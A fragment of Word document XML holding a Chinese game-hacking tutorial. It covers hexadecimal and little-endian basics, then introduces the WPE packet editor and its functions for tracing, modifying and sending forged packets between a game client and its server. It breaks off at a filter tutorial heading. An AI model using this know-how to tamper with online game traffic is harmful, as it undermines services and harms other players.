    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　简单说来，二进制数就是一种只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个数码，每满</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则进一位的计数进位法。同样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制就是每满十六就进一位的计数进位法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0--F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十六个数字，它为表示十到十五的数字采用了</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>六个数字，它们和十进制的对应关系是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。而且，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制数和二进制数间有一个简单的对应关系，那就是；四位二进制数相当于一位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制数。比如，一个四位的二进制数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1111</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就相当于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就相当于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　了解这些基础知识对修改游戏有着很大的帮助，下面我就要谈到这个问题。由于在计算机中数据是以二进制的方式储存的，同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制数和二进制间的转换关系十分简单，所以大部分的修改工具在显示计算机中的数据时会显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制的代码，而且在你修改时也需要输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制的数字。你清楚了吧？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在游戏中看到的数据可都是十进制的，在要寻找并修改参数的值时，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的计算器来进行十进制和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制的换算，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>我们可以在开始菜单里的程序组中的附件中找到它。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　现在要了解的知识也差不多了！不过，有个问题在游戏修改中是需要注意的。在计算机中数据的储存方式一般是低位数储存在低位字节，高位数储存在高位字节。比如，十进制数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>41715</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制的数为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A2F3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但在计算机中这个数被存为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F3A2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　看了以上内容大家对数据的存贮和数据的对应关系都了解了吗？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好了，接下来我们要告诉大家在游戏中，封包到底是怎么一回事了，来！大家把袖口卷起来，让我们来干活吧！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　二：什么是封包？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　怎么截获一个游戏的封包？怎么去检查游戏服务器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址和端口号？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户使用的各种信息服务，其通讯的信息最终均可以归结为以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包为单位的信息传送，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包除了包括要传送的数据信息外，还包含有信息要发送到的目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址、信息发送的源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址、以及一些相关的控制信息。当一台路由器收到一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包时，它将根据数据包中的目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址项查找路由表，根据查找的结果将此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包送往对应端口。下一台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由器收到此数据包后继续转发，直至发到目的地。路由器之间可以通过路由协议来进行路由信息的交换，从而更新路由表。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　那么我们所关心的内容只是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包中的数据信息，我们可以使用许多监听网络的工具来截获客户端与服务器之间的交换数据，下面就向你介绍其中的一种工具：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用方法：执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会有下列几项功能可选择：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SELECT GAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择目前在记忆体中您想拦截的程式，您只需双击该程式名称即可。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TRACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>追踪功能。用来追踪撷取程式送收的封包。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须先完成点选欲追踪的程式名称，才可以使用此项目。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Play</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键开始撷取程式收送的封包。您可以随时按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂停追踪，想继续时请再按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。按下正方形可以停止撷取封包并且显示所有已撷取封包内容。若您没按下正方形停止键，追踪的动作将依照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OPTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的设定值自动停止。如果您没有撷取到资料，试试将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OPTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里调整为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winsock Version 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WPE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trainers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是设定在显示至少</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">16 bits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>颜色下才可执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FILTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤功能。用来分析所撷取到的封包，并且予以修改。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SEND PACKET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>送出封包功能。能够让您送出假造的封包。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TRAINER MAKER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>制作修改器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设定功能。让您调整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一些设定值。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FILTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的详细教学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
